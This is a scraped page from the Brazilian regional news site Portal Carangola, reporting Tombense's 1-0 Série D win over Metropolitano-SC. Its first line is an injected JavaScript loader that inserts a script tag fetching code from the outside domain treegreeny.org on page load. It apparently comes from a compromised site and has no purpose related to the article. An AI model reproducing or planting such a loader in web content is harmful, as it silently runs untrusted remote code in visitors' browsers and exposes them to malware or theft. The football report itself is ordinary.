;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Daniel Amorim marca, Tombense bate Metropolitano-SC e avança na Série D - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Daniel Amorim marca, Tombense bate Metropolitano-SC e avança na Série D

tombenseO Tombense vai disputar as quartas de final da Série D do Campeonato Brasileiro. Em duelo na tarde deste sábado, no estádio Almeidão, em Tombos, a equipe mineira criou, levou mais perigo e contou com gol solitário do atacante Daniel Amorim no segundo tempo para vencer o Metropolitano-SC por 1 a 0. A equipe catarinense ainda teve o lateral Carlos Alberto expulso no fim do jogo.
Com o resultado, a equipe de Tombos passou de fase e aguardam o chaveamento das quartas de final. O clube catarinense dá adeus à competição.
O jogo
O Tombense entrou em campo com mais disposição ofensiva e logo nos primeiros cinco minutos assustou duas vezes, com Juninho e Élvis, que obrigaram o goleiro Dida a fazer duas grandes intervenções. Os visitantes reagiram aos 18, com boa jogada do atacante Lauro César, que cruzou para Thiago Silva, livre, cabecear para fora.
O Tombense era mais agudo quando atacava, e conseguia recompor a defesa com rapidez, forçando os defensores do Metropolitano a trocar passes. Marcelo Cordeiro procurava dar opções na esquerda do Verdão, mas o time carecia de inspiração no meio-campo. Ainda no primeiro tempo, os dois times tiveram que mexer na meia-cancha devido a lesões. No lado mineiro, Denilson deu lugar ao experiente Joilson. Pelos catarinenses, o capitão Everton Cezar saiu para a entrada de Cícero. O primeiro tempo terminou sem gols.
No retorno do intervalo foi a vez do time de Blumenau pressionar a equipe da Zona da Mata mineiro, sem converter, no entanto, as chances criadas. Em seguida, o Tombense se recuperou e voltou a mandar na partida, e a desperdiçar oportunidades.
Aos 33 minutos, no entanto, o atacante Daniel Amorim não perdoou. Ele recebeu cruzamento de Joilson na área e mandou de cabeça para o fundo do gol. O time mineiro tentou ampliar, mas parou novamente no goleiro Dida. Sem conseguir aumentar a vantagem, o Tombense tratou de segurar o resultado, em alguns momentos com entradas mais fortes. Mas quem acabou vendo o cartão vermelho foi Metropolitano. O lateral Carlos Alberto parou Joilson em jogada de perigo e foi expulso.

Informação: João Santana

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.